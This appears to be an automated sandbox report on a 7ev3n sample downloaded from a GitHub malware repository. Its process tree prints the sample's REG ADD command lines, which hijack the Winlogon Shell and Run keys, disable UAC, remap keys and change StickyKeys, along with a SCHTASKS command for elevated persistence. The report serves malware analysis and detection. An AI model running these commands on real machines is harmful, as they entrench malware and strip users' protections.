Resubmissions

| submitted | task | score |
| --- | --- | --- |
| 15/05/2025, 12:20 | 250515-ph86xagj5w | 10 |
| 15/05/2025, 12:18 | 250515-pg217swxfs | 8 |
| 15/05/2025, 12:17 | 250515-pf8glavqx2 | 10 |

Analysis

max time kernel: 49s
max time network: 51s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted: 15/05/2025, 12:17

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://github.com/Da2dalus/The-MALWARE-Repo
Resource: win10v2004-20250502-en

General

Target: https://github.com/Da2dalus/The-MALWARE-Repo

Malware Config

Signatures
Modifies WinLogon for persistence (2 TTPs, 2 IoCs)

| description | ioc | Process |
| --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | reg.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | reg.exe |

UAC bypass (3 TTPs, 2 IoCs)

| description | ioc | Process |
| --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe |

Downloads MZ/PE file (1 IoCs)

| flow | pid | Process |
| --- | --- | --- |
| 157 | 3784 | msedge.exe |

Executes dropped EXE (4 IoCs)

| pid | Process |
| --- | --- |
| 3500 | 7ev3n.exe |
| 5824 | 7ev3n.exe |
| 3120 | system.exe |
| 1016 | system.exe |

Adds Run key to start application (2 TTPs, 2 IoCs)

| description | ioc | Process |
| --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | reg.exe |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" | reg.exe |

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)

| flow | ioc |
| --- | --- |
| 155 | raw.githubusercontent.com |
| 156 | raw.githubusercontent.com |
| 157 | raw.githubusercontent.com |

System Location Discovery: System Language Discovery (1 TTPs, 43 IoCs)

Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | shutdown.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 7ev3n.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 7ev3n.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | SCHTASKS.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | system.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | SCHTASKS.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | shutdown.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | system.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe |

Checks processor information in registry (2 TTPs, 2 IoCs)

Processor information is often read in order to detect sandboxing environments.

| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | msedge.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | msedge.exe |

Enumerates system info in registry (2 TTPs, 3 IoCs)

| description | ioc | Process |
| --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe |

Modifies data under HKEY_USERS (2 IoCs)

| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | msedge.exe |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133917850573289134" | msedge.exe |

Modifies registry class (2 IoCs)

| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-186956858-2143653872-2609589082-1000\{56EE996B-4B2C-4C1A-A76B-6DC8063771A6} | msedge.exe |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe |

Scheduled Task/Job: Scheduled Task (1 TTPs, 2 IoCs)

Schtasks is often used by malware for persistence or to perform post-infection execution.

| pid | Process |
| --- | --- |
| 3508 | SCHTASKS.exe |
| 5348 | SCHTASKS.exe |

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)

| pid | Process |
| --- | --- |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |

Suspicious use of AdjustPrivilegeToken (4 IoCs)

| description | pid | Process |
| --- | --- | --- |
| Token: SeShutdownPrivilege | 828 | shutdown.exe |
| Token: SeRemoteShutdownPrivilege | 828 | shutdown.exe |
| Token: SeShutdownPrivilege | 5548 | shutdown.exe |
| Token: SeRemoteShutdownPrivilege | 5548 | shutdown.exe |

Suspicious use of FindShellTrayWindow (10 IoCs)

| pid | Process |
| --- | --- |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |
| 4852 | msedge.exe |

Suspicious use of WriteProcessMemory (64 IoCs)

Identical consecutive rows are collapsed; the rows column gives how many times each entry appears in sequence.

| description | pid | Process | procid_target | rows |
| --- | --- | --- | --- | --- |
| PID 4852 wrote to memory of 1768 | 4852 | msedge.exe | 87 | 2 |
| PID 4852 wrote to memory of 3784 | 4852 | msedge.exe | 88 | 2 |
| PID 4852 wrote to memory of 3664 | 4852 | msedge.exe | 89 | 51 |
| PID 4852 wrote to memory of 3944 | 4852 | msedge.exe | 90 | 9 |
Processes

Each entry gives the image path, the PID, the full command line and the signatures that fired on that process; indentation shows the parent/child relationship.

- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 4852]
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
  Signatures: Checks processor information in registry; Enumerates system info in registry; Modifies data under HKEY_USERS; Modifies registry class; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of WriteProcessMemory
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 1768]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x2d8,0x7ffd8017f208,0x7ffd8017f214,0x7ffd8017f220
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 3784]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1900,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2332 /prefetch:3
    Signatures: Downloads MZ/PE file
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 3664]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2296,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2292 /prefetch:2
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 3944]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2396,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=2428 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 3436]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 2992]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3532,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 4916]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4240,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 3868]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4296,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:2
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 1736]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3504,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=3668 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 748]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3672,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5328 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 1148]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5096,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 2464]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5300,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5132 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe [PID 4132]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe [PID 4856]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 828]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6068,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6104 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 4780]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6264,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6284 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 3340]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6348,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6172 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 4280]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6184,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6212 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 4288]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6604,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6616 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 2252]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6776 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 5096]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6936 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 3120]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6924,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=6804 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 3492]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=704,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4484 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 5916]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6080,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4304 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 5888]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5292,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=120 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 6108]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=6416,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:1
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 6100]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7132,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 6084]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6592,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=4304 /prefetch:8
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe [PID 6048]
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6076,i,13705023641281908888,14302234880513917303,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:8
  - C:\Users\Admin\Downloads\7ev3n.exe [PID 3500]
    Command line: "C:\Users\Admin\Downloads\7ev3n.exe"
    Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
    - C:\Users\Admin\AppData\Local\system.exe [PID 3120]
      Command line: "C:\Users\Admin\AppData\Local\system.exe"
      Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      - C:\Windows\SysWOW64\cmd.exe [PID 5472]
        Command line: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
        Signatures: System Location Discovery: System Language Discovery
      - C:\Windows\SysWOW64\SCHTASKS.exe [PID 5348]
        Command line: C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
        Signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task
      - C:\windows\SysWOW64\cmd.exe [PID 4380]
        Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        Signatures: System Location Discovery: System Language Discovery
        - C:\Windows\SysWOW64\reg.exe [PID 5620]
          Command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          Signatures: Modifies WinLogon for persistence; System Location Discovery: System Language Discovery
      - C:\windows\SysWOW64\cmd.exe [PID 5096]
        Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        Signatures: System Location Discovery: System Language Discovery
        - C:\Windows\SysWOW64\reg.exe [PID 5660]
          Command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          Signatures: Adds Run key to start application; System Location Discovery: System Language Discovery
      - C:\windows\SysWOW64\cmd.exe [PID 6016]
        Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
        Signatures: System Location Discovery: System Language Discovery
        - C:\Windows\SysWOW64\reg.exe [PID 2184]
          Command line: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
          Signatures: System Location Discovery: System Language Discovery
      - C:\windows\SysWOW64\cmd.exe [PID 5980]
        Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
        Signatures: System Location Discovery: System Language Discovery
        - C:\Windows\SysWOW64\reg.exe [PID 616]
          Command line: REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
          Signatures: System Location Discovery: System Language Discovery
      - C:\windows\SysWOW64\cmd.exe [PID 1204]
        Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
        Signatures: System Location Discovery: System Language Discovery
        - C:\Windows\SysWOW64\reg.exe [PID 4968]
          Command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
          Signatures: System Location Discovery: System Language Discovery
      - C:\windows\SysWOW64\cmd.exe [PID 1576]
        Command line: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
        Signatures: System Location Discovery: System Language Discovery
        - C:\Windows\SysWOW64\reg.exe [PID 3572]
          Command line: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
